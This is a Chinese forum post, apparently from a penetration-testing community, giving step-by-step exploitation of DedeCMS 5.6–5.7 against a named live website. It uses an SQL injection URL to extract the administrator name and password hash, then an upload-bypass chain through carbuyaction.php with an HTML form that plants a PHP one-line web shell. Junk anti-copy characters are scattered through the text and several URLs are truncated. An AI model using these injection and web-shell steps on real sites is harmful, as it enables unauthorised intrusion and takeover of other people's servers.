中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
% @7 h0 C, J2 ~4 Q$ J% Z" w这站 http://www.political-security.com/4 Z1 G' r6 d) W3 w, h0 I2 C! {0 V2 c
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
. ?& z& j2 g  ?. R9 r- b8 jwww.political-security.com/data/mysql_error_trace.inc 爆后台
! B- |+ F- F: p+ _; U然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。1 \) N+ f) O# S* C1 E3 b/ [
然后写上语句 ! F' Q# N+ A" d2 `* {$ j
查看管理员帐号
1 J0 x1 M* x/ F, I+ S1 Ahttp://www.political-security.co ... &membergroup=@`
1 ?+ v- A0 M% T, x& ^7 h, c* Z
+ P1 _2 Q+ j$ `9 s5 G* m9 `admin
: s% H: f6 f6 L+ N) q2 J* T' s0 k3 x9 {/ M; j7 ]
查看管理员密码
  P% \! U% ]9 e# u, ]% g4 x  A http://www.political-security.co ... &membergroup=@`" W4 y% O! K# ]0 B
# ^# u/ V3 A3 {  S! ^! e
8d29b1ef9f8c5a5af429: i/ b  j5 Q* U. t& H, r! r

: w& P0 B6 w6 P查看管理员密码
6 P- A: C8 e, X# @6 T) {* ]" D/ n1 _- O
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; \) N6 \8 T. b& `0 T4 Z; c! Y5 a" _' y9 w* b) I
8d2) X! V  y9 C) ]; O3 e, Y
9b1ef9f8c5a5af42
' S% Z7 }7 e* A6 R6 `9
% Y( X& k# r8 R2 q  ~1 ?; M. Q
cmd5没解出来 只好测试第二个方法7 o* h$ w3 A! m, a% S2 g5 l+ p

% K) N1 O' S0 l
8 @) Q2 C" g5 z* }" |②上传漏洞:
$ ?! [+ w' Z( t& H) w  c, s. V
3 j& \( d4 o4 f' z只要登陆会员中心,然后访问页面链接5 Z3 a& c, M) T' \/ C" t4 O
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
* E/ m0 T, |% v1 p* V
+ F7 F9 E' [: c! O( x: c5 o; G2 d0 ^如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
/ \) B+ g  ~; r4 o5 v& O# O6 `" a5 p+ N
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
3 V) G7 c. h1 }6 L; z0 ]. V+ b, H3 O$ |: v( H, U
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
4 \8 L' n% G. C% O或者
! m3 b/ Q6 _) D, N: v% _+ _) |. `即可上传成功




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2